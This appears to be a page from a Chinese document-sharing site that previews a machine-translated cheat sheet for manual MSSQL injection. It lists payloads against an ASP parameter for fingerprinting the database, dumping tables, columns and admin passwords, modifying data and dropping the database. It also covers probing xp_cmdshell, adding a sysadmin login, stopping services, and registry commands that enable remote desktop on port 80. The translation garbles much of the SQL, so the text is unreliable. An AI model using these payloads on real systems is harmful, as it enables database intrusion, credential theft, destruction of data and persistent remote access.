- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
手工mssql注入(Manual MSSQL injection)
手工mssql注入(Manual MSSQL injection)
存在(SELECT * FROM sysobjects)/判断是否是MSSQL
存在(SELECT * FROM tablename)/判断某表是否存在TableName为表名..
1 =(版本)/ MSSQL版本
1 =(选择db_name())/当前数据库名
1 =(选择@ @ ServerName)/本地服务名
1 =(选择is_srvrolemember(sysadmin ))/判断是否是系统管理员
1 =(选择is_member(db_owner ))/判断是否是库权限
1 =(选择has_dbaccess(“主人”))/判断是否有库读取权限
1 =(选择的名字,从master.dbo.sysdatabases DBID = 1)/暴库名DBID为1,2,3的…
;声明int /是否支持多行D
1 =(select count(*)从哪里master.dbo.sysobjects xtype =“X”和名称=“xp_cmdshell )/判断xp_cmdshell是否存在
1 =(select count(*)从master.dbo.sysobjects name =“xp_regread )/查看xp_regread扩展存储过程是不是已经被删除
添加和删除一个SA权限的用户测试:(需要SA权限)
执行master.dbo.sp_addlogin测试,密码
执行master.dbo.sp_addsrvrolemember测试,系统管理员
停掉或激活某个服务(需要SA权限)。
执行主.. xp_servicecontrol 停止,schedule”
执行主.. xp_servicecontrol 开始,schedule”
暴网站目录
创建表labeng(拉拉nvarchar(255),ID int)
声明@结果varchar(255)执行master.dbo.xp_regread”hkey_local_machine,controlset001 \服务\系统\ W3SVC \参数\虚拟根目录”、“/”、“结果输出插入labeng(拉拉)值(@结果);
1 =(从labeng选择前1或者拉拉)1 =(select count(*)从哪里labeng拉拉 1)
-----------------------------------------------------分割
3389并修改端口号DOS下开
SC配置来说开始=汽车
启动来说
/ /允许外连
注册地址“hkey_local_machine \系统\ CurrentControlSet \控制\终端服务器”/ V fdenytsconnections / T reg_dword / D / F 0
该端口到80 / 3389
注册地址“hkey_local_machine \系统\ CurrentControlSet \控制\终端服务器winstations \ RDP TCP端口号/ V / T reg_dword / 80 / f
SQL Server
判断是否可注射:
/article.asp?ID = 6
/article.asp?id = 6
/article.asp?id = 6和1 = 1
/article.asp?id = 6和1 = 2
/article.asp?动作=值和1 = 1
/article.asp?动作=值和1 = 2
searchpoints %和1 = 1
searchpoints %和1 = 2
确定数据库类型:
/article.asp?id = 6和用户 0
/article.asp?ID = 6(select count(*)从sysobjects) 0
查询当前用户数据信息:
article.asp?id = 6,具有1=1
暴当前表中的列:
article.asp?ID = 6组有1 = 1 admin.username --
article.asp?ID = 6组管理员用户名,admin.password 1 = 1
暴任意表和列:
和(选择前1名(选择前N个ID,名字中,X型= char(85))T订单ID号) 1
和(选择上col_name(object_id(admin ),n)从sysobjects) 1
暴数据库数据:
和(从管理员id是N)选择前1名的密码 1
修改数据库中的数据:
;更新管理设置密码=“oooooo在用户名= xxx”
Add data to the database:
Insert, into, admin, values (XXX, oooooo) -
Delete database:
Drop, database,
您可能关注的文档
- 循环再生产业的价值形成与实现机制(Value formation and implementation mechanism of recycling industry).doc
- 循环经济(circular economy).doc
- 循环队列的基本操作(The basic operation of a circular queue).doc
- 微信的商业模式与创业机会(WeChat's business models and entrepreneurial opportunities).doc
- 微博舆论(Micro-blog consensus).doc
- 微商陷入困境,社交电商前途迷茫(Micro quotient into trouble, the future of social electricity supplier confused).doc
- 微信朋友圈,是客厅还是围城(WeChat's circle of friends, living room or besieged city).doc
- 徐淑英中国管理研究企业培训应有本土特征(Xu Shuying China's management research, enterprise training should have local characteristics).doc
- 微机原理_在线作业_b(The principle of microcomputer _ online operation _b).doc
- 微机原理上机考试题库加答案(The principle of microcomputer examination questions with answers).doc
- 中国国家标准 GB 14287.5-2025电气火灾监控系统 第5部分:测量热解粒子式电气火灾监控探测器.pdf
- 《GB/T 42706.4-2025电子元器件 半导体器件长期贮存 第4部分:贮存》.pdf
- GB/T 42706.4-2025电子元器件 半导体器件长期贮存 第4部分:贮存.pdf
- 中国国家标准 GB/T 42706.4-2025电子元器件 半导体器件长期贮存 第4部分:贮存.pdf
- 中国国家标准 GB/T 19436.2-2025机械电气安全 电敏保护设备 第2部分:使用有源光电保护装置(AOPDs)设备的特殊要求.pdf
- 《GB/T 19436.2-2025机械电气安全 电敏保护设备 第2部分:使用有源光电保护装置(AOPDs)设备的特殊要求》.pdf
- 《GB 27898.4-2025固定消防给水设备 第4部分:消防气体顶压给水设备》.pdf
- GB 27898.4-2025固定消防给水设备 第4部分:消防气体顶压给水设备.pdf
- GB/T 31270.1-2025化学农药环境安全评价试验准则 第1部分:土壤代谢试验.pdf
- 中国国家标准 GB/T 31270.1-2025化学农药环境安全评价试验准则 第1部分:土壤代谢试验.pdf
原创力文档


文档评论(0)